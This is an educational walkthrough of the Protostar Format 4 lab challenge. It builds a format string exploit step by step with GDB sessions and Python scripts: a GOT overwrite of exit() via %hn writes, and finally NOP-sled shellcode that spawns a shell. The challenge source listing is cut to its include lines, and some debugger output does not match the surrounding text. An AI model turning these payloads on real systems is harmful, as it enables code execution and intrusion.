Protostar Format 4 Walkthrough

Let’s tackle the Protostar Format 4 challenge from Exploit Exercises (https://exploit-exercises.com/protostar/format4/). This is a detailed step-by-step walkthrough explaining all the tools and techniques needed — we’ll be writing a format string exploit.

Format 4 Challenge

Here’s the source code for the challenge, format4.c:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

The program reads a string from the standard input and passes it to printf. We need to craft a string that will cause a call to hello().

Exploring the Stack

First thing we’ll do is try to explore the stack of the program when printf is called. Let’s open format4 in GDB:

user@protostar:/opt/protostar/bin$ gdb format4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) set disassembly-flavor intel
(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>info registers
>x/1i $eip
>x/32x $esp
>end
(gdb) set pagination off

To start with, I configure a few creature comforts so that GDB displays the registers, the current CPU instruction, and the contents of the stack every time a breakpoint is reached. (As I finished writing, I realized these aren’t really needed here, but I left them in anyway.) I explain these in a bit more detail in the Stack 7 walkthrough: https://medium.com/@airman604/protostar-stack7-walkthrough-2aa2428be3e0. Now let’s run it and play with the input:

(gdb) run
Starting program: /opt/protostar/bin/format4
ABCDEF
ABCDEF

Interesting. If we pass a plain string, we get the same string as output. If we use one of the printf format specifiers, such as %p, printf will interpret it and expect an additional argument. No additional arguments are provided, but printf will still pick up the values from the stack where those arguments would normally be and use them. %p tells printf to interpret the next argument as a 4-byte (on 32-bit systems) pointer (i.e. a memory address) and print it in hex. We add | as a divider, and we also place a pattern we can easily recognize, AAAA, at the beginning of the string. It turns out the string we pass on stdin is itself on the stack: by instructing printf to walk the stack, we find it printed back as 0x41414141 (AAAA in hex). This makes sense, since buffer is a local variable in vuln() and so it is located on the stack during execution. See my Stack 7 walkthrough (link above) for more info on how the stack works and how it is laid out.

Reading Arbitrary Program Memory

OK, let’s start crafting our exploit by exploring the program memory:

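Here is a minimal sketch of this first script in Python 3. The layout (AAAA followed by ten |%p directives) is inferred from the output further down, so treat it as an assumption:

```python
#!/usr/bin/env python3
# Sketch: emit a stack-probing format string for format4.
# Assumed layout: "AAAA" followed by ten "|%p" directives.
import sys

def build_probe(count=10):
    # "AAAA" is an easy-to-spot marker (it prints as 0x41414141 with %p);
    # each "|%p" makes printf print the next 4-byte word it finds on the stack.
    return b"AAAA" + b"|%p" * count

if __name__ == "__main__":
    sys.stdout.buffer.write(build_probe())
```

Writing raw bytes through sys.stdout.buffer stops Python 3 from re-encoding them. That starts to matter once the payload contains addresses with non-ASCII bytes.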

Our starting point is the same string we used before. Run the exploit:

user@protostar:~$ ./format4.py >/tmp/f4

Back in GDB:

(gdb) run </tmp/f4
Starting program: /opt/protostar/bin/format4 </tmp/f4
AAAA|0x200|0xb7fd8420|0xbffff5f4|0x41414141|0x7c70257c|0x257c7025|0x70257c70|0x7c70257c|0x257c7025|0x70257c70
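
We can double-check that these words really are our input by packing them back into bytes. Below is a small plain-Python sketch that uses the fourth through seventh values from the run above. x86 is little-endian, so the lowest byte of each printed value is the first byte in memory:

```python
import struct

def words_to_bytes(hex_words):
    """Turn %p output (one 32-bit word each) back into the bytes in memory."""
    # "<I" = little-endian unsigned 32-bit, matching x86 byte order.
    return b"".join(struct.pack("<I", int(w, 16)) for w in hex_words)

# Values 4-7 printed by the run above.
leaked = ["0x41414141", "0x7c70257c", "0x257c7025", "0x70257c70"]
print(words_to_bytes(leaked))  # b'AAAA|%p|%p|%p|%p'
```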

We see that the beginning of the string can be found on the stack in the fourth “parameter” to printf. Let’s find a string in memory we’d like to display:

(gdb) disas hello
Dump of assembler code for function hello:
0x080484b4 <hello+0>: push ebp
0x080484b5 <hello+1>: mov ebp,esp
0x080484b7 <hello+3>: sub esp,0x18
0x080484ba <hello+6>: mov DWORD PTR [esp],0x80485f0
0x080484c1 <hello+13>: call 0x80483dc <puts@plt>
0x080484c6 <hello+18>: mov DWORD PTR [esp],0x1
0x080484cd <hello+25>: call 0x80483bc <_exit@plt>
End of assembler dump.
(gdb) x/s 0x80485f0
0x80485f0: "code execution redirected! you win"

We see that memory at address 0x80485f0 contains the string “code execution redirected! you win”. Let’s trick the program into displaying it! All we need to do is replace AAAA with the address of the string and change the fourth %p to %s. printf will then interpret the address we provide as the location of a NUL-terminated string and print that string. Here’s the modified exploit:

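Here is a sketch of the modified script in Python 3. The number of trailing |%p directives is an assumption chosen to match the output below. The address is packed little-endian, so the fourth argument printf reads is 0x080485f0:

```python
#!/usr/bin/env python3
# Sketch: make printf treat our first 4 bytes as a char* and print what it points to.
import struct
import sys

WIN_STRING = 0x080485f0  # "code execution redirected! you win" (from x/s above)

def build_read_payload(addr=WIN_STRING):
    # Arguments 1-3 are stepped over with %p; argument 4 is the first word
    # of our buffer, i.e. the packed address, which %s dereferences.
    fmt = b"|%p|%p|%p|%s" + b"|%p" * 6
    return struct.pack("<I", addr) + fmt

if __name__ == "__main__":
    sys.stdout.buffer.write(build_read_payload())
```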

And now run it (run the exploit first and redirect output to /tmp/f4):

(gdb) run </tmp/f4
Starting program: /opt/protostar/bin/format4 </tmp/f4
|0x200|0xb7fd8420|0xbffff5f4|code execution redirected! you win|0x7c70257c|0x257c7025|0x73257c70|0x7c70257c|0x257c7025|0x70257c70

It works!

Modifying Memory With printf

So far so good, but we’ve only learned how to explore the contents of memory. How is it even possible to hijack the program’s execution flow with printf? Doesn’t it just print stuff to the standard output? If we check the man page for printf (the C function, not the shell command, i.e. man 3 printf), we find this gem in the BUGS section:

Code such as printf(foo); often indicates a bug, since foo may contain a % character. If foo comes from untrusted user input, it may contain %n, causing the printf() call to write to memory and creating a security hole.

“Write to memory” sounds promising, let’s check what %n does:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument.  No argument is converted.

So, printf(“AAAA%n”, &n_char) will print AAAA to the standard output and then store 4 in the n_char variable. Our input string sits on the stack, so we control the value printf reads as that pointer argument. That means we can pass any memory address instead of &n_char. Excellent!
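
To watch %n in action outside the challenge, here is a small sketch that calls the C library’s snprintf through Python’s ctypes. It assumes Linux with glibc, where ctypes.CDLL(None) exposes the libc already loaded into the Python process. snprintf is used instead of printf only so that the output lands in a buffer we can inspect:

```python
import ctypes

# Assumption: Linux with glibc; CDLL(None) gives access to the libc
# already loaded into the Python process.
libc = ctypes.CDLL(None)

buf = ctypes.create_string_buffer(64)
n_char = ctypes.c_int(0)

# Same idea as printf("AAAA%n", &n_char), but the text goes into `buf`.
written = libc.snprintf(buf, ctypes.c_size_t(len(buf)), b"AAAA%n", ctypes.byref(n_char))

print(buf.value, written, n_char.value)  # b'AAAA' 4 4
```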

Let’s try to write 0x41 to the target variable. Find its memory address first:

(gdb) break main
Breakpoint 10 at 0x804851a: file format4/format4.c, line 27.
(gdb) run
Starting program: /opt/protostar/bin/format4 </tmp/f4
eax 0xbffff874 -1073743756
ecx 0xd63131a5 -701419099
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7c8 0xbffff7c8
esi 0x0 0
edi 0x0 0
eip 0x804851a 0x804851a <main+6>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804851a <main+6>: call 0x80484d2 <vuln>
0xbffff7c0: 0x08048540 0x00000000 0xbffff848 0xb7eadc76
0xbffff7d0: 0x00000001 0xbffff874 0xbffff87c 0xb7fe1848
0xbffff7e0: 0xbffff830 0xffffffff 0xb7ffeff4 0x080482b3
0xbffff7f0: 0x00000001 0xbffff830 0xb7ff0626 0xb7fffab0
0xbffff800: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff810: 0xbffff848 0xfc66e7b5 0xd63131a5 0x00000000
0xbffff820: 0x00000000 0x00000000 0x00000001 0x08048400
0xbffff830: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4

Inspecting target in GDB (for example with x/x &target) shows that its value is 0 and that it’s located at 0x804973c. Let’s use it:

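Here is a sketch of what this first attempt could look like. The layout is a hypothetical reconstruction, not necessarily the author’s script: the address of target, some padding, %p%p%p to step over arguments 1 to 3, and %n to write through argument 4. The padding counts each %p as two printed characters, which is exactly the mistake discussed below:

```python
#!/usr/bin/env python3
# Sketch of a naive first attempt (hypothetical layout): aim for target == 0x41.
import struct
import sys

TARGET = 0x0804973c  # address of the global `target`

def build_naive_payload(want=0x41):
    addr = struct.pack("<I", TARGET)  # becomes printf argument 4
    walk = b"%p%p%p"                  # consume arguments 1-3 so %n uses argument 4
    # Naive padding: treats the 6 characters of "%p%p%p" as if printed verbatim.
    pad = b"A" * (want - len(addr) - len(walk))
    return addr + pad + walk + b"%n"

if __name__ == "__main__":
    sys.stdout.buffer.write(build_naive_payload())
```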

Run it in GDB (remember to run the script first and save its output to /tmp/f4):

(gdb) disas vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) break *0x0804850f
Breakpoint 11 at 0x804850f: file format4/format4.c, line 22.
(gdb) run </tmp/f4
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/format4 </tmp/f4
eax 0xbffff874 -1073743756
ecx 0x1cbc0fd9 482086873
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7c8 0xbffff7c8
esi 0x0 0
edi 0x0 0
eip 0x804851a 0x804851a <main+6>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804851a <main+6>: call 0x80484d2 <vuln>
0xbffff7c0: 0x08048540 0x00000000 0xbffff848 0xb7eadc76
0xbffff7d0: 0x00000001 0xbffff874 0xbffff87c 0xb7fe1848
0xbffff7e0: 0xbffff830 0xffffffff 0xb7ffeff4 0x080482b3
0xbffff7f0: 0x00000001 0xbffff830 0xb7ff0626 0xb7fffab0
0xbffff800: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff810: 0xbffff848 0x36ebd9c9 0x1cbc0fd9 0x00000000
0xbffff820: 0x00000000 0x00000000 0x00000001 0x08048400
0xbffff830: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4

We set a second breakpoint in vuln right after printf (on the call to exit) and start the program. At the beginning of main the value of target is 0; after the printf it is 0x54. The good news is that we’ve managed to change it. The bad news is that it’s not the expected 0x41. What happened is that we computed the padding from the length of our input string, but printf replaces each two-character %p with a hex value (like 0xb7fd8420), which is longer.
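
Assume the payload budgeted two characters per %p (six for %p%p%p), and that arguments 1 to 3 print the same values as in the earlier %p run (0x200, 0xb7fd8420 and 0xbffff5f4). Under those assumptions the numbers line up exactly:

```python
# Values printed for arguments 1-3 in the earlier %p run.
printed_args = ["0x200", "0xb7fd8420", "0xbffff5f4"]

intended = 0x41                                   # 65 characters planned
budgeted = len("%p%p%p")                          # 6 characters assumed for the directives
actual_chars = sum(len(s) for s in printed_args)  # 5 + 10 + 10 = 25 characters really printed

result = intended - budgeted + actual_chars
print(hex(result))  # 0x54
```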

This brings us to the first trick we’ll use: the parameter field modifier. It lets us reference a printf argument directly by its position, without consuming the arguments before it: printf(“%4$d”, 1, 2, 3, 4, 5) will print 4. This is just what we need to reference the memory address we plant on the stack, without a chain of %p directives to step over the stack values we don’t need. Here’s our modified exploit to overwrite target:

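Here is a minimal Python 3 sketch of the modified exploit (the padding byte A is an arbitrary choice). Every byte before %4$n is printed verbatim, so 4 address bytes plus 61 padding bytes give exactly 0x41:

```python
#!/usr/bin/env python3
# Sketch: write 0x41 into `target` with a direct-parameter %n.
import struct
import sys

TARGET = 0x0804973c  # address of the global `target`

def build_positional_payload(want=0x41):
    addr = struct.pack("<I", TARGET)  # becomes printf argument 4
    pad = b"A" * (want - len(addr))   # printed verbatim: 4 + 61 = 65 characters
    return addr + pad + b"%4$n"       # write the count through argument 4

if __name__ == "__main__":
    sys.stdout.buffer.write(build_positional_payload())
```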

And run it in GDB:

(gdb) run </tmp/f4
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/format4 </tmp/f4
eax 0xbffff874 -1073743756
ecx 0xdb1dea4c -618796468
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7c8 0xbffff7c8
esi 0x0 0
edi 0x0 0
eip 0x804851a 0x804851a <main+6>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804851a <main+6>: call 0x80484d2 <vuln>
0xbffff7c0: 0x08048540 0x00000000 0xbffff848 0xb7eadc76
0xbffff7d0: 0x00000001 0xbffff874 0xbffff87c 0xb7fe1848
0xbffff7e0: 0xbffff830 0xffffffff 0xb7ffeff4 0x080482b3
0xbffff7f0: 0x00000001 0xbffff830 0xb7ff0626 0xb7fffab0
0xbffff800: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff810: 0xbffff848 0xf14a3c5c 0xdb1dea4c 0x00000000
0xbffff820: 0x00000000 0x00000000 0x00000001 0x08048400
0xbffff830: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4

It works perfectly now.
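
The positional %N$ form can also be tried outside the challenge. Here is a small sketch that calls libc’s snprintf from Python via ctypes. It assumes Linux with glibc, where ctypes.CDLL(None) exposes the C library already loaded into the Python process:

```python
import ctypes

# Assumption: Linux with glibc; CDLL(None) exposes libc's snprintf.
libc = ctypes.CDLL(None)
buf = ctypes.create_string_buffer(32)

# "%4$d" jumps straight to the 4th variadic argument; 1, 2 and 3 are skipped.
libc.snprintf(buf, ctypes.c_size_t(len(buf)), b"%4$d", 1, 2, 3, 4, 5)
print(buf.value)  # b'4'
```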

The second trick we’ll need for this exploit is the “length modifier” for printf conversions. If we wanted to write, say, 0x0804abcd to some memory address using %n, we would need to print 134,523,853 characters (0x0804abcd in decimal). That’s a lot! But if we use %hn instead, printf treats the argument as a pointer to a short int, i.e. 2 bytes. So instead of one write of 0x0804abcd, we can do two separate writes of 0x0804 and 0xabcd, which needs printf to output at most 43,981 characters (0xabcd in decimal). Also, the buffer is only 512 bytes long, so we can’t simply pass a string long enough to produce all of those characters. Instead, we’ll use the field width modifier (a number placed right after %). For example, printf(“%500d”, 5) will print 499 spaces followed by the number 5, 500 characters in all.
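
The bookkeeping for the two %hn writes can be sketched in plain Python. The helper name split_for_hn is hypothetical. For each write it returns the offset from the base address and the field width to print before that %hn. The offset is 0 for the low half and 2 for the high half, since x86 is little-endian. The smaller half is written first because printf’s character count can only grow:

```python
def split_for_hn(value, already_printed=0):
    """Plan two %hn writes that store the 32-bit `value` at some base address.

    Returns (offset, width) pairs in the order the writes must happen:
    offset 0 is the low half, offset 2 the high half (little-endian x86);
    width is how many characters to print (e.g. via a field width) before that %hn.
    """
    halves = sorted([(value & 0xFFFF, 0), (value >> 16, 2)])  # smaller half first
    plan, count = [], already_printed
    for half, offset in halves:
        width = half - count  # printf's character count only ever grows
        if width <= 0:
            raise ValueError("half already exceeded; this sketch does not wrap around")
        plan.append((offset, width))
        count += width
    return plan

print(split_for_hn(0x0804abcd))  # [(2, 2052), (0, 41929)]
print(0x0804abcd)                # 134523853, the count a single %n would need
```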

We also notice that exit() is called right after printf() in vuln(). That means vuln() never returns, so overwriting its return address would be useless. Our third trick, then, is to overwrite the address of exit() in the Global Offset Table (GOT). This also makes the exploit more reliable, as we don’t need to guess the exact location of the return address on the stack. See my Heap 3 walkthrough for more info on the GOT: https://medium.com/@airman604/protostar-heap-3-walkthrough-56d9334bcd13

The Exploit

Our plan is clear now. We’ll use the input string to plant the addresses of the upper and lower halves of exit’s GOT entry. Then we’ll print the required number of characters and use %hn twice to overwrite the address of exit in the GOT with the address of hello().

Let’s find all the needed addresses:

(gdb) p hello
$17 = {void (void)} 0x80484b4 <hello>
(gdb) disas vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) x/3i 0x80483ec
0x80483ec <exit@plt>: jmp DWORD PTR ds:0x8049724
0x80483f2 <exit@plt+6>: push 0x30
0x80483f7 <exit@plt+11>: jmp 0x804837c
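
exit@plt jumps through the pointer stored at 0x8049724, so that GOT slot is what we overwrite. Because x86 is little-endian, the low half of the new pointer goes to 0x08049724 and the high half to 0x08049726. The plain-Python simulation below shows the two 16-bit writes combining into the address of hello(). A bytearray stands in for the slot, so nothing touches the real process:

```python
import struct

EXIT_GOT = 0x08049724  # GOT slot used by exit@plt (from the x/3i output)
HELLO = 0x080484b4     # address of hello()

# A bytearray stands in for the 4-byte GOT slot.
mem = bytearray(4)

def write_short(addr, value):
    """Mimic %hn: store the low 16 bits of `value` at `addr`, little-endian."""
    offset = addr - EXIT_GOT
    mem[offset:offset + 2] = struct.pack("<H", value & 0xFFFF)

write_short(EXIT_GOT + 2, HELLO >> 16)   # high half: 0x0804 at 0x08049726
write_short(EXIT_GOT, HELLO & 0xFFFF)    # low half: 0x84b4 at 0x08049724
print(hex(struct.unpack("<I", mem)[0]))  # 0x80484b4
```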

So we need to overwrite the memory at 0x08049724 with 0x080484b4. Let’s put it all together:

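Here is a Python 3 sketch of the full exploit. Two details are choices made for this sketch, not confirmed parts of the original script:

- The padding also uses positional form (%1$2044x pads to 2044 characters using argument 1), which avoids mixing numbered and unnumbered conversions.
- A trailing newline ends the fgets() input.

```python
#!/usr/bin/env python3
# Sketch: overwrite exit()'s GOT entry with the address of hello() using two %hn writes.
import struct
import sys

EXIT_GOT = 0x08049724  # from `x/3i 0x80483ec`
HELLO = 0x080484b4     # from `p hello`

def build_got_payload(got=EXIT_GOT, value=HELLO):
    high, low = value >> 16, value & 0xFFFF  # 0x0804 and 0x84b4
    if high >= low:
        raise ValueError("this sketch assumes the high half is the smaller one")
    # These 8 bytes are the first two words of the buffer: printf arguments 4 and 5.
    addrs = struct.pack("<II", got + 2, got)  # arg 4: high-half address, arg 5: low-half address
    pad1 = high - len(addrs)  # 8 chars already printed; reach 0x0804 for the first %hn
    pad2 = low - high         # then reach 0x84b4 for the second %hn
    # %1$<w>x pads using argument 1; %4$hn / %5$hn write through arguments 4 / 5.
    fmt = b"%%1$%dx%%4$hn%%1$%dx%%5$hn" % (pad1, pad2)
    return addrs + fmt + b"\n"  # newline ends the fgets() input

if __name__ == "__main__":
    sys.stdout.buffer.write(build_got_payload())
```

With this address order the payload starts with 0x26 (&) and, four bytes later, 0x24 ($). That would account for the &$ at the start of the output below, since most of the other address bytes are not printable. The tens of thousands of padding characters are what the <snip> hides.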

And it works when we run it as:

user@protostar:/opt/protostar/bin$ ~/format4.py | ./format4
&$
<snip>
code execution redirected! you win

Where’s My Shellz?

Without much explanation, here’s a modified exploit that executes a shell. It places a NOP sled (\x90 bytes) followed by shellcode in the buffer. 0xbffff5d0 is approximately the middle of the sled, and jumping anywhere into the sled slides execution down into the shellcode:

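Here is a hedged Python 3 sketch of such an exploit. Several pieces are assumptions, not the original script:

- The shellcode is a widely used 25-byte 32-bit Linux execve("/bin//sh") stub.
- The 400-byte sled length is arbitrary.
- 0xbffff5d0 only lands in the sled if the buffer sits where it did in the article’s environment. Stack addresses usually shift between GDB and a direct run.

The GOT overwrite uses the same two-%hn technique as before, now writing 0xbfff and then 0xf5d0:

```python
#!/usr/bin/env python3
# Sketch: point exit()'s GOT entry into a NOP sled that leads to execve("/bin//sh") shellcode.
import struct
import sys

EXIT_GOT = 0x08049724
SLED_ADDR = 0xbffff5d0  # approximate address inside the sled; environment-dependent

# Common 32-bit Linux execve("/bin//sh", ["/bin//sh", NULL], NULL) shellcode.
# It contains no NUL or newline bytes, so fgets() and printf() pass it through intact.
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")

def build_shell_payload(sled_len=400):
    high, low = SLED_ADDR >> 16, SLED_ADDR & 0xFFFF  # 0xbfff, 0xf5d0
    if high >= low:
        raise ValueError("this sketch assumes the high half is the smaller one")
    addrs = struct.pack("<II", EXIT_GOT + 2, EXIT_GOT)  # printf arguments 4 and 5
    fmt = b"%%1$%dx%%4$hn%%1$%dx%%5$hn" % (high - len(addrs), low - high)
    payload = addrs + fmt + b"\x90" * sled_len + SHELLCODE + b"\n"
    if len(payload) > 511:  # fgets() stores at most 511 bytes in the 512-byte buffer
        raise ValueError("payload too long for fgets()")
    return payload

if __name__ == "__main__":
    sys.stdout.buffer.write(build_shell_payload())
```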

This should be executed as:

user@protostar:/opt/protostar/bin$ (~/format4_shell.py; cat) | ./format4

For more info on NOP sleds and the (…; cat) | … trick, see my Stack 7 walkthrough.

References

LiveOverflow Binary Hacking course — https://www.youtube.com/watch?v=iyAyN3GFM7A&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN

My Protostar Stack 7 walkthrough: https://medium.com/@airman604/protostar-stack7-walkthrough-2aa2428be3e0

